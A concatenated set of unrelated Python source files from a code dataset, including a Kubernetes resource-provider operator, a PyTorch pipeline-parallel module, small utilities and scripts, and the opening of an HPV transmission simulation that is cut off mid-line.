@staticmethod\n def manage_provider_deleted(provider_name):\n if provider_name in ResourceProvider.providers:\n del ResourceProvider.providers[provider_name]\n\n def __init__(self, provider):\n self.metadata = provider['metadata']\n self.spec = provider['spec']\n self.__init_resource_validator()\n\n def __init_resource_validator(self):\n open_api_v3_schema = self.spec.get('validation', {}).get('openAPIV3Schema', None)\n if not open_api_v3_schema:\n self.resource_validator = None\n return\n self.resource_validator = openapi_schema_validator.OAS30Validator(open_api_v3_schema)\n\n @property\n def name(self):\n return self.metadata['name']\n\n @property\n def namespace(self):\n return self.metadata['namespace']\n\n @property\n def match(self):\n return self.spec.get('match', None)\n\n @property\n def match_ignore(self):\n return self.spec.get('matchIgnore', [])\n\n @property\n def override(self):\n return self.spec.get('override', {})\n\n @property\n def resource_requires_claim(self):\n return self.spec.get('resourceRequiresClaim', False)\n\n def check_template_match(self, handle_resource, claim_resource, logger):\n \"\"\"\n Check if a resource in a handle matches a resource in a claim\n \"\"\"\n patch = [\n item for item in gpte.kubeoperative.jsonpatch_from_diff(\n handle_resource, claim_resource\n ) if item['op'] in ['add', 'replace']\n ]\n # Return false if any item from the patch is not ignored\n ignore_re_list = [ re.compile(pattern + '$') for pattern in self.match_ignore ]\n for item in patch:\n ignored = False\n for ignore_re in ignore_re_list:\n if ignore_re.match(item['path']):\n ignored = True\n if not ignored:\n return None\n return patch\n\n def is_match_for_template(self, template):\n \"\"\"\n Check if this provider is a match for the resource template by checking\n that all fields in the match definition match the template.\n \"\"\"\n if not self.match:\n return False\n cmp_template = copy.deepcopy(template)\n dict_merge(cmp_template, self.match)\n return template == cmp_template\n\n def resource_claim_template_defaults(self, resource_claim, resource_index):\n defaults = self.spec.get('default', {})\n open_api_v3_schema = self.spec.get('validation', {}).get('openAPIV3Schema', None)\n\n if open_api_v3_schema:\n schema_defaults = defaults_from_schema(open_api_v3_schema)\n if schema_defaults:\n dict_merge(defaults, schema_defaults)\n\n return recursive_process_template_strings(\n defaults,\n {\n 'resource_claim': resource_claim,\n 'resource_index': resource_index,\n 'resource_provider': self\n }\n )\n\n def resource_definition_from_template(self, handle, claim, resource_index, logger):\n if claim:\n requester_identity, requester_user = get_requester_from_namespace(\n claim['metadata']['namespace']\n )\n else:\n requester_identity = requester_user = None\n\n handle_name = handle['metadata']['name']\n handle_generate_name = handle['metadata'].get('generateName')\n if handle_generate_name and handle_name.startswith(handle_generate_name):\n guid = handle_name[len(handle_generate_name):]\n elif handle_name.startswith('guid-'):\n guid = handle_name[5:]\n else:\n guid = handle_name[-5:]\n\n resource = copy.deepcopy(handle['spec']['resources'][resource_index]['template'])\n if 'override' in self.spec:\n dict_merge(resource, self.override)\n if 'metadata' not in resource:\n resource['metadata'] = {}\n if 'name' not in resource['metadata']:\n # If name prefix was not given then use prefix \"guidN-\" with resource index to\n # prevent name conflicts. If the resource template does specify a name prefix\n # then it is expected that the template configuration prevents conflicts.\n if 'generateName' not in resource['metadata']:\n resource['metadata']['generateName'] = 'guid{}-'.format(resource_index)\n resource['metadata']['name'] = \\\n resource['metadata']['generateName'] + guid\n if 'annotations' not in resource['metadata']:\n resource['metadata']['annotations'] = {}\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-provider-name': self.name,\n ko.operator_domain + '/resource-provider-namespace': self.namespace,\n ko.operator_domain + '/resource-handle-name': handle['metadata']['name'],\n ko.operator_domain + '/resource-handle-namespace': handle['metadata']['namespace'],\n ko.operator_domain + '/resource-handle-uid': handle['metadata']['uid'],\n ko.operator_domain + '/resource-handle-version': handle['metadata']['resourceVersion'],\n ko.operator_domain + '/resource-index': str(resource_index)\n })\n if claim:\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-claim-name': claim['metadata']['name'],\n ko.operator_domain + '/resource-claim-namespace': claim['metadata']['namespace'],\n })\n if requester_identity:\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-requester-email':\n requester_identity.get('extra', {}).get('email', ''),\n ko.operator_domain + '/resource-requester-name':\n requester_identity.get('extra', {}).get('name', ''),\n ko.operator_domain + '/resource-requester-preferred-username':\n requester_identity.get('extra', {}).get('preferred_username', ''),\n })\n if requester_user:\n resource['metadata']['annotations'].update({\n ko.operator_domain + '/resource-requester-user':\n requester_user['metadata']['name']\n })\n\n return recursive_process_template_strings(resource, {\n \"requester_identity\": requester_identity,\n \"requester_user\": requester_user,\n \"resource_provider\": self,\n \"resource_handle\": handle,\n \"resource_claim\": claim\n })\n\n def update_resource(self, handle, resource, resource_definition, logger):\n handle_uid = handle['metadata']['uid']\n handle_version = handle['metadata']['resourceVersion']\n\n annotations = resource['metadata'].get('annotations', {})\n if handle_uid != annotations.get(ko.operator_domain + '/resource-handle-uid') \\\n or handle_version != annotations.get(ko.operator_domain + '/resource-handle-version'):\n update_filters = self.spec.get('updateFilters', []) + [{\n 'pathMatch': '/metadata/annotations/' + re.escape(ko.operator_domain) + '~1resource-.*'\n }]\n ko.patch_resource(\n resource=resource,\n patch=resource_definition,\n update_filters=update_filters\n )\n\n def validate_resource_template(self, template, logger):\n try:\n if self.resource_validator:\n validation_result = self.resource_validator.validate(template)\n except Exception as e:\n return str(e)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourceproviders')\ndef watch_providers(event, logger, **_):\n if event['type'] == 'DELETED':\n provider = event['object']\n provider_name = provider['metadata']['name']\n provider_namespace = provider['metadata']['namespace']\n if provider_namespace == ko.operator_namespace:\n ResourceProvider.manage_provider_deleted(provider_name)\n logger.info('Removed ResourceProvider %s', provider_name)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n provider = event['object']\n provider_name = provider['metadata']['name']\n provider_namespace = provider['metadata']['namespace']\n if provider_namespace == ko.operator_namespace:\n ResourceProvider.manage_provider(provider)\n logger.info('Discovered ResourceProvider %s', provider_name)\n else:\n logger.info(\n 'Ignoring ResourceProvider %s in namespace %s',\n provider_name, provider_namespace\n )\n else:\n logger.warning('Unhandled ResourceProvider event %s', event)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourceclaims')\ndef watch_resource_claims(event, logger, **_):\n pause_for_provider_init()\n claim = event['object']\n if event['type'] == 'DELETED':\n manage_claim_deleted(claim, logger)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n manage_claim(claim, logger)\n else:\n logger.warning('Unhandled ResourceClaim event %s', event)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourcehandles')\ndef watch_resource_handles(event, logger, **_):\n pause_for_provider_init()\n handle = event['object']\n if event['type'] == 'DELETED':\n manage_handle_deleted(handle, logger)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n manage_handle(handle, logger)\n else:\n logger.warning('Unhandled ResourceHandle event %s', event)\n\n@kopf.on.event(ko.operator_domain, ko.version, 'resourcepools')\ndef watch_resource_pools(event, logger, **_):\n pause_for_provider_init()\n if event['type'] == 'DELETED':\n pool = event['object']\n manage_pool_deleted(pool, logger)\n elif event['type'] in ['ADDED', 'MODIFIED', None]:\n pool = event['object']\n if 'deletionTimestamp' in pool['metadata']:\n manage_pool_pending_delete(pool, logger)\n else:\n manage_pool(pool, logger)\n else:\n logger.warning('Unhandled ResourcePool event %s', event)\n","sub_path":"operator/operator.py","file_name":"operator.py","file_ext":"py","file_size_in_byte":43772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"20249959","text":"import torch\nimport torch.nn as nn\nfrom torch import autograd\nfrom typing import Iterable, List, Tuple\nfrom pipeline.sync_wrapper import *\n\n\nclass PipelineParallel(nn.Module):\n \"\"\"\n class that gets submodules of one large model and the devices they should be on (+ microbatch size)\n and makes the large model that they consist as a pipeline with each submodule being a station\n **IMPORTANT** this is functionally like 'Sequential(submodules)', so be aware of that and make sure that\n the list submodules reflects what you want\n \"\"\"\n\n def __init__(self, module: nn.Module, microbatch_size: int, num_gpus: int, input_shape: Tuple[int, ...] = None,\n mode: str = 'train', counter: CycleCounter = None, main_device: str = 'cpu', wrappers=None):\n super(PipelineParallel, self).__init__()\n\n self.main_device = main_device\n self.microbatch_size = microbatch_size\n self.num_gpus = num_gpus\n\n self.module = module\n self.wrappers = module.wrappers if wrappers is None else wrappers\n self.input_shape = input_shape\n\n if counter is None:\n counter = CycleCounter(ForwardMode[mode], num_gpus)\n for wrapper in self.wrappers:\n wrapper.set_counter(counter)\n\n self.counter = counter\n\n self.mode = None\n self.set_mode(mode)\n\n def train(self, mode=True):\n super(PipelineParallel, self).train(mode)\n if mode:\n self.set_mode('train')\n else:\n self.set_mode('production')\n\n def set_mode(self, mode: str):\n if self.mode == mode:\n return\n\n self.mode = mode\n self.counter.change_mode(mode)\n for wrapper in self.wrappers:\n wrapper.change_mode(mode)\n\n def finished_prop(self):\n self.counter.reset()\n for wrapper in self.wrappers:\n wrapper.finished_prop()\n\n def forward(self, input: torch.Tensor) -> torch.Tensor:\n \"\"\"\n forward propagation of the entire model\n will run in a pipeline using the cuda kernels and the prod_line function\n makes sure that the backward propagation hook is also added\n\n note: a forward propagation deletes all previously saved activations,\n so if you want to use backward with some results, do it before running the model again\n on other inputs\n\n :param input: inputted batch\n :return: results of forward propagation on the batch\n \"\"\"\n microbatches = input.split(self.microbatch_size, dim=0)\n num_runs = len(microbatches)\n\n if self.input_shape is None:\n self.input_shape = (1, *input[0].size())\n\n # make sure that the counter knows how many microbatches there are\n self.counter.reset()\n self.counter.set_num_runs(num_runs)\n\n if self.mode == 'backward':\n if self.training:\n self.set_mode('train')\n else:\n self.set_mode('production')\n\n results = []\n # the actual pipeline process of feeding the data and receiving outputs:\n for cycle in range(self.num_gpus + num_runs - 1):\n # feeding the module all the microbatches, then, until the forward\n # propagation process ends needs to feed garbage.\n if cycle < num_runs:\n input = microbatches[cycle]\n else:\n input = torch.zeros(*self.input_shape)\n\n result: torch.Tensor = self.module(input)\n\n # the first microbatch will finish the forward propagation only\n # after num_gpus cycles.\n if cycle >= self.num_gpus - 1:\n if self.training:\n result.requires_grad_()\n result.register_hook(lambda grad: self.wrappers[-1].act_hook(grad))\n results.append(result.to(self.main_device))\n\n self.counter.increase()\n\n # make sure that the counter and wrappers are returned to default mode\n self.finished_prop()\n\n output = torch.cat(tuple(results), dim=0).detach_()\n if self.training:\n output.requires_grad_()\n output.register_hook(lambda grad: self.backward(grad, results))\n return output\n\n def backward(self, grads: torch.Tensor, results: List[torch.Tensor]):\n \"\"\"\n does backward propagation with gradients of full results,\n works as hook for normal autograd backward propagation so it usually shouldn't\n be called implicitly but used as part of loss.backward() or something like that\n :param grads: the gradient of the model outputs\n :param results: the results tensor that is doing a backward pass\n \"\"\"\n num_runs = len(results)\n\n # make sure that the counter knows how many microbatches there are\n self.counter.set_num_runs(num_runs)\n\n # make sure that we are on backward mode\n self.set_mode('backward')\n\n # do a backward run for each gradient\n for grad, result in zip(grads.split(self.microbatch_size, dim=0), results):\n result.backward(grad)\n self.module(torch.zeros(*self.input_shape))\n\n # make sure that all backward passes are done\n for _ in range(self.num_gpus):\n self.module(torch.zeros(*self.input_shape))\n\n # get final gradients\n # out_grads = self.wrappers[0].get_final_grads()\n\n # make sure that the counter and wrappers are returned to default mode\n self.finished_prop()\n\n # return out_grads\n\n","sub_path":"pipeline/pipeline_parallel.py","file_name":"pipeline_parallel.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"100672011","text":"import math\n\n\n# find Largest Contiguous\n# SubAay sum in a given range with updates\nclass SegmentTree:\n def __init__(self, N):\n # segment tree for N numbers\n self.tree = [0 for _ in range(2 * N + 1)]\n\n def build(self, A: list, lo: int, hi: int, i: int):\n if lo == hi:\n self.tree[i] = A[lo]\n else:\n mid, L, R = lo + (hi - lo >> 1), 2 * i + 1, 2 * i + 2\n self.build(A, lo, mid, L)\n self.build(A, mid + 1, hi, R)\n self.tree[i] = self.tree[L] + self.tree[R]\n\n def update(self, A: list, i: int, lo: int, hi: int, idx: int, value: int):\n if lo == hi:\n self.tree[i] = value\n else:\n mid, L, R = lo + (hi - lo >> 1), 2 * i + 1, 2 * i + 2\n if idx <= mid:\n self.update(A, L, lo, mid, idx, value)\n else:\n self.update(A, R, mid + 1, hi, idx, value)\n self.tree[i] = self.tree[L] + self.tree[R]\n\n def query(self, A: list, i: int, lo: int, hi: int, l: int, r: int):\n if r < lo or hi < l:\n return -math.inf\n elif l <= lo and hi <= r:\n return self.tree[i]\n else:\n mid, L, R = lo + (hi - lo >> 1), 2 * i + 1, 2 * i + 2\n if l > mid:\n return self.query(A, R, mid + 1, hi, l, r)\n elif r <= mid:\n return self.query(A, L, lo, mid, l, r)\n right = self.query(A, R, mid + 1, hi, l, r)\n left = self.query(A, L, lo, mid, l, r)\n return left + right\n\n","sub_path":"data_structure/python/segment_tree_sum.py","file_name":"segment_tree_sum.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"408038114","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport numpy as np\nfrom sklearn import decomposition\nfrom PIL import Image\n\nTupian = Image.open('test.jpg')\n\nLupian = Tupian.convert('L')\nLupian.save(\"gray.jpg\")\n\ndata = []\nimage = img.imread('gray.jpg')\nprint(image.shape)\ndata.append(image)\n\nn_row, n_col = 2,3\nn_components = 6\nimage_shape = (24,30)\n\ndef plot_gallery(title, images, n_col=n_col, n_row=n_row):\n plt.figure(figsize=(2. * n_col, 2.26 * n_row)) \n plt.suptitle(title, size=16)\n \n for i, comp in enumerate(images):\n plt.subplot(n_row, n_col, i + 1)\n vmax = max(comp.max(), -comp.min())\n \n plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,\n interpolation='nearest', vmin=-vmax, vmax=vmax)\n plt.xticks(())\n plt.yticks(())\n plt.subplots_adjust(0.01, 0.05, 0.99, 0.94, 0.04, 0.)\n plt.savefig(str(name))\n\nestimators = [('Eigenfaces - PCA using randomized SVD',decomposition.PCA(n_components=1,whiten=True)),\\\n ('Non-negative components - NMF',decomposition.NMF(n_components=1,init='nndsvda',tol=5e-3))]\n\nfor name,estimator in estimators:\n print(\"Extracting the top %d %s...\" % (n_components,name))\n print(image.shape)\n estimator.fit(image)\n components_ = estimator.components_\n print(components_)\n print(len(components_[0]))\n plot_gallery(name, components_[:n_components])\n\nplt.show()","sub_path":"code/降维/NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"32946858","text":"#!/usr/bin/env python3\n\n\"\"\"\nScript to print numbers from 1 to X in alphabetical order\n\"\"\"\n\nimport argparse\nimport unittest\n\nDEFAULT_MAX = 1_000_000\n\nSMALL = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\", \"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\", \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\nTENS = [None, None, \"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\", \"eighty\", \"ninety\"]\n\ndef number_to_word(number):\n if number < len(SMALL):\n return SMALL[number]\n digits = list(reversed([int(x) for x in str(number)]))\n if number < 100:\n if digits[0] == 0:\n return TENS[digits[1]]\n return \"%s %s\" % (TENS[digits[1]], SMALL[digits[0]])\n if number < 1000:\n two_digits = 10 * digits[1] + digits[0]\n hundred = SMALL[digits[2]] + \" hundred\"\n if two_digits == 0:\n return hundred\n return \"%s and %s\" % (hundred, number_to_word(two_digits))\n if number < 1_000_000:\n three_digits = 100 * digits[2] + 10 * digits[1] + digits[0]\n thousands = digits[3]\n if len(digits) > 4:\n thousands = thousands + digits[4] * 10\n if len(digits) > 5:\n thousands = thousands + digits[5] * 100\n thousands_string = \"%s thousand\" % number_to_word(thousands)\n if three_digits == 0:\n return thousands_string\n return \"%s %s\" % (thousands_string, number_to_word(three_digits))\n if number == 1_000_000:\n return \"one million\"\n\n\n raise ValueError(\"Unexpected number %s\" % (number,))\n\ndef run_tests():\n \"\"\"\n Tests\n \"\"\"\n\n class Tester(unittest.TestCase):\n\n def one_test(self, number, expected_word):\n actual_word = number_to_word(number)\n self.assertEqual(expected_word, actual_word)\n\n def test_small(self):\n self.one_test(0, \"zero\")\n self.one_test(2, \"two\")\n self.one_test(7, \"seven\")\n self.one_test(9, \"nine\")\n self.one_test(15, \"fifteen\")\n\n def test_tens(self):\n self.one_test(20, \"twenty\")\n self.one_test(21, \"twenty one\")\n self.one_test(35, \"thirty five\")\n self.one_test(99, \"ninety nine\")\n\n def test_hundreds(self):\n self.one_test(100, \"one hundred\")\n self.one_test(500, \"five hundred\")\n self.one_test(520, \"five hundred and twenty\")\n self.one_test(329, \"three hundred and twenty nine\")\n\n def test_thousands(self):\n self.one_test(1000, \"one thousand\")\n self.one_test(4000, \"four thousand\")\n self.one_test(45000, \"forty five thousand\")\n self.one_test(100000, \"one hundred thousand\")\n self.one_test(451000, \"four hundred and fifty one thousand\")\n \n def test_thousands_with_hundreds(self):\n self.one_test(1001, \"one thousand one\")\n self.one_test(4511, \"four thousand five hundred and eleven\")\n self.one_test(201592, \"two hundred and one thousand five hundred and ninety two\")\n\n def test_million(self):\n self.one_test(1_000_000, \"one million\")\n\n unittest.TextTestRunner(verbosity=2).run(unittest.TestLoader().loadTestsFromTestCase(Tester))\n\ndef show(max_number):\n numbers = [number_to_word(x) for x in range(0, max_number+1)]\n for number in sorted(numbers):\n print(number)\n\n\ndef main():\n\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"action\", choices=[\"test\", \"show\"])\n parser.add_argument(\"--max-number\", type=int)\n args = parser.parse_args()\n\n max_number = args.max_number\n if max_number is None:\n max_number = DEFAULT_MAX\n \n if args.action == \"test\":\n run_tests()\n elif args.action == \"show\":\n show(max_number)\n else:\n raise ValueError(\"Unexpected action %s\" % (args.action))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582549805","text":"from eca import *\nfrom eca.generators import start_offline_tweets\n\n## You might have to update the root path to point to the correct path\n## (by default, it points to _static)\n#root_content_path = 'template_static'\n\n\n# binds the 'setup' function as the action for the 'init' event\n# the action will be called with the context and the event\n@event('init')\ndef setup(ctx, e):\n start_offline_tweets('batatweets.txt', 'chirp', time_factor=100000)\n ctx.count = 0\n fire('timer')\ntweet_count = 0\n@event('timer')\n#loop that updates the rolling chart and gauge every second\ndef checktime(ctx, e):\n global tweet_count\n #Workaround for if no tweets have been counted:\n if tweet_count == 0:\n tweet_count=0.01\n emit('tweetcount',{'action': 'add', 'value': tweet_count})\n #Reset tweet count for next iteration\n tweet_count=0\n fire('timer', delay=1)\n#For every tweet add the hashtags to the wordcloud with value 1\ndef updateWordCloud(tweetdata):\n hashtags = tweetdata['entities']['hashtags']\n for i in range(len(hashtags)):\n emit('word', {'action': 'add', 'value': [hashtags[i][\"text\"], 1]})\n#For every tweet send, if coordinates exist, coordinates and tweet text to tweetmap\ndef updateMap(tweetdata):\n if tweetdata['coordinates'] != None:\n emit('map', {'action': 'add', 'values': [tweetdata['coordinates']['coordinates'], tweetdata[\"text\"]]})\n#Emit tweet if user matches @batavierenrace\ndef updateOfficialTweet(tweetdata):\n if tweetdata['user']['id_str'] == \"19373068\":\n emit('officialtweet', tweetdata)\n#tweet event\n@event('chirp')\ndef tweet(ctx, e):\n global tweet_count\n tweet_count = tweet_count + 1\n #Retrieve tweet data from e\n tweetdata = e.data\n #Call update functions for wordcloud, map, official tweetfeed\n updateWordCloud(tweetdata)\n updateMap(tweetdata)\n updateOfficialTweet(tweetdata)\n #update live tweet feed\n emit('tweet', tweetdata)\n","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"537095228","text":"from django import template\nfrom gestor.models import Sponsor\nregister = template.Library()\n\n\n@register.inclusion_tag('gestor/sponsors.html', takes_context=True)\ndef show_sponsors(context):\n sponsors = Sponsor.objects.filter(publicado=True)\n return {'sponsors': sponsors.exclude(destacar=True),\n 'destacados': sponsors.exclude(destacar=False)}\n","sub_path":"gestor/templatetags/sponsors.py","file_name":"sponsors.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"116041610","text":"import datetime\nimport json\nimport time\n\nfrom logbook import Logger\nfrom logbook import TimedRotatingFileHandler\nfrom optparse import OptionParser\n\nimport config\nimport classifier\nimport category\nimport redis_util\n\n\nclass Main(object):\n \"\"\"Main loop.\"\"\"\n\n def __init__(self, conf):\n self.conf = conf\n handler = TimedRotatingFileHandler(\n conf.log_file, date_format='%Y-%m-%d')\n handler.push_application()\n self.logger = Logger('Firetower-server')\n self.queue = redis_util.get_redis_conn(\n host=conf.redis_host, port=conf.redis_port, redis_db=conf.redis_db\n )\n self.classifier = classifier.Levenshtein()\n self.last_archive = None\n\n def get_error(self):\n \"\"\"Get the next error to be categorised\"\"\"\n return self.queue.rpop(self.conf.queue_key)\n\n def run_archiving(self):\n \"\"\"Run the timeseries archiving for all categories\n \"\"\"\n now = datetime.datetime.utcnow()\n if self.last_archive is None:\n self.last_archive = datetime.datetime.utcnow()\n return\n\n delta = datetime.timedelta(seconds=self.conf.archive_time)\n if self.last_archive < (now - delta):\n self.logger.debug('Archiving counts older than %s seconds' % (self.conf.archive_time,))\n for c in category.Category.get_all_categories(self.queue):\n self.logger.debug('Archiving for %s category' % (c.cat_id))\n c.timeseries.archive_cat_counts(self.last_archive)\n self.last_archive = now\n\n def run(self):\n \"\"\"Drop into a loop pulling errors and categorizing them\"\"\"\n while 1:\n err = self.get_error()\n self.run_archiving()\n if err:\n parsed = json.loads(err)\n category.Category.classify(\n self.queue, self.classifier, parsed, self.conf.class_thresh\n )\n else:\n time.sleep(1)\n\n\ndef main():\n parser = OptionParser(usage='usage: firetower options args')\n parser.add_option(\n '-c', '--conf', action='store', dest='conf_path',\n help='Path to YAML configuration file.')\n\n (options, args) = parser.parse_args()\n\n conf = config.Config(options.conf_path)\n main = Main(conf)\n main.run()\n","sub_path":"firetower/firetower.py","file_name":"firetower.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"586530583","text":"__author__ = 'upendrakumardevisetty'\n#edited by andrew.d.l.nelson@gmail.com\n\nimport sys\n\nlistfile = sys.argv[1]\ninfile = sys.argv[2]\noutfile = sys.argv[3]\n\nAI_DICT = {}\n\nwith open(listfile, \"rU\") as list_in:\n for line in list_in:\n AI_DICT[line[:-1]] = 1\n\nskip = 0\n\nwith open(infile, \"rU\") as fh_in:\n with open(outfile, \"w\") as fh_out:\n for line in fh_in:\n if line.startswith('>'):\n line_split = line.split('=')\n gene = line_split[0]\n if gene in AI_DICT:\n fh_out.write(line)\n skip = 0\n else:\n skip = 1\n else:\n if not skip:\n fh_out.write(line)\n","sub_path":"evolinc-ii/4.0/extract_sequences.py","file_name":"extract_sequences.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"210300972","text":"# coding: utf-8\n# Condições IF ELIF ELSE\n# Classificando Atletas\n\nfrom datetime import date\n\nanoNascimento = int(input(\"Ano de Nascimento: \"))\nidade = date.today().year - anoNascimento\n\ncategoria = \"\"\nif (idade <= 9):\n categoria = \"MIRIM\"\nelif (idade <= 14):\n categoria = \"INFANTIL\"\nelif (idade <= 19):\n categoria = \"JUNIOR\"\nelif (idade <= 25):\n categoria = \"SÊNIOR\"\nelse:\n categoria = \"MASTER\"\n\nprint(\"O atleta tem {} anos.\".format(idade))\nprint(\"Classificação: {}\".format(categoria))\n\n","sub_path":"mundo2/exercicio41.py","file_name":"exercicio41.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"207237578","text":"import uuid\nfrom enum import Enum\nimport random\nimport time\nimport numpy as np\nimport pandas as pd\n\nnp.seterr(divide='ignore', invalid='ignore')\n\n\nclass Gender(Enum):\n MALE = 1\n FEMALE = 2\n\n\nclass HPVType(Enum):\n HPV16 = 0\n HPV18 = 1\n HPVoHR = 2\n HPVLR = 3\n\n\nclass Data:\n\n def __init__(self, section):\n self.COHORT_SIZE: int = int(section[\"COHORT_SIZE\"])\n self.SIM_YEARS: int = int(section[\"SIM_YEARS\"])\n self.SIM_MONTHS = self.SIM_YEARS * 12\n self.CYCLE_LENGTH: int = int(section[\"CYCLE_LENGTH\"])\n self.CONCURRENCY_MALE: float = float(section[\"CONCURRENCY_MALE\"])\n self.CONCURRENCY_FEMALE: float = float(section[\"CONCURRENCY_FEMALE\"])\n self.PROB_MARITAL: float = float(section[\"PROB_MARITAL\"])\n self.PROB_CASUAL: float = float(section[\"PROB_CASUAL\"])\n self.PROB_SHORT_TERM: float = float(section[\"PROB_SHORT_TERM\"])\n self.PROB_INSTANTANEOUS: float = float(section[\"PROB_INSTANTANEOUS\"])\n self.DUR_MARITAL: int = int(section[\"DUR_MARITAL\"])\n self.DUR_CASUAL: int = int(section[\"DUR_CASUAL\"])\n self.DUR_SHORT_TERM: int = int(section[\"DUR_SHORT_TERM\"])\n self.SEX_PER_MONTH_MARITAL: int = int(section[\"SEX_PER_MONTH_MARITAL\"])\n self.SEX_PER_MONTH_CASUAL: int = int(section[\"SEX_PER_MONTH_CASUAL\"])\n self.SEX_PER_MONTH_SHORT_TERM: int = int(section[\"SEX_PER_MONTH_SHORT_TERM\"])\n self.SEXUAL_DEBUT_AGE: int = int(section[\"SEXUAL_DEBUT_AGE\"])\n self.TRANSMISSION_PER_SEX_ACT: float = float(section[\"TRANSMISSION_PER_SEX_ACT\"])\n self.NATURAL_IMMUNITY_HPV16: float = float(section[\"NATURAL_IMMUNITY_HPV16\"])\n self.NATURAL_IMMUNITY_HPV18: float = float(section[\"NATURAL_IMMUNITY_HPV18\"])\n self.NATURAL_IMMUNITY_HPVoHR: float = float(section[\"NATURAL_IMMUNITY_HPVoHR\"])\n self.NATURAL_IMMUNITY_HPVLR: float = float(section[\"NATURAL_IMMUNITY_HPVLR\"])\n self.BACKGROUND_MORTALITY_FEMALE = pd.read_csv(section[\"BACKGROUND_MORTALITY_FEMALE_FILE\"])\n self.BACKGROUND_MORTALITY_MALE = pd.read_csv(section[\"BACKGROUND_MORTALITY_MALE_FILE\"])\n self.AGE_OF_PARTNER = pd.read_csv(section[\"AGE_OF_PARTNER_FILE\"])\n self.PARTNERSHIP_FORMATION = pd.read_csv(section[\"PARTNERSHIP_FORMATION_FILE\"])\n self.INITIAL_POPULATION = pd.read_csv(section[\"INITIAL_POPULATION_FILE\"])\n self.HPV_CLEARANCE = pd.read_csv(section[\"HPV_CLEARANCE_FILE\"])\n self.incidentinfections = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n self.prevalentinfections = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n self.noinfection = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n self.totalalive = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n\n def count_incident_infections(self, infection):\n self.incidentinfections[infection.InfectionAge][Individual.year] += 1\n\n def count_infection_denom(self, age):\n self.noinfection[age][Individual.year] += 1\n\n def count_prevalent_infections(self, age):\n self.prevalentinfections[age][Individual.year] += 1\n\n def count_total_alive(self, age):\n self.totalalive[age][Individual.year] += 1\n\n def write_infections(self, run):\n incidence = np.divide(self.incidentinfections, self.noinfection)\n prevalence = np.divide(self.prevalentinfections, self.totalalive)\n np.savetxt('incidence_' + run + '.csv', incidence, fmt='%f')\n np.savetxt('prevalence_' + run + '.csv', prevalence, fmt='%f')\n\n\nclass Infection:\n\n def __init__(self):\n self.Type = None\n self.Timer = 1\n self.HPVTransmission = None\n self.NaturalImmunity = None\n\n def get_clearance(self):\n return -1\n\n def check_serodiscordance(self, person, sexacts):\n discordant = True\n infection_keys = [key for key, value in person.Infections.items() if value.Type == self.Type]\n if len(infection_keys) > 0:\n discordant = False\n\n if discordant:\n self.transmit_infection(person, sexacts)\n\n def transmit_infection(self, person, sexacts):\n pass\n\n def get_hpv_transmission(self, person):\n infection_keys = [key for key, value in person.ClearedInfections.items() if value.Type == self.Type]\n if len(infection_keys) > 0:\n history = True\n else:\n history = False\n if history:\n return self.HPVTransmission * self.NaturalImmunity\n else:\n return self.HPVTransmission\n\n\nclass HPV16Infection(Infection):\n\n def __init__(self, data, age):\n super(HPV16Infection, self).__init__()\n self.Type = HPVType.HPV16\n self.HPVClearance = data.HPV_CLEARANCE[\"HPV16\"]\n self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPV16\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPV16Infection)\n break\n\n\nclass HPV18Infection(Infection):\n\n def __init__(self, data, age):\n super(HPV18Infection, self).__init__()\n self.Type = HPVType.HPV18\n self.HPVClearance = data.HPV_CLEARANCE[\"HPV18\"]\n self.HPVTransmission = 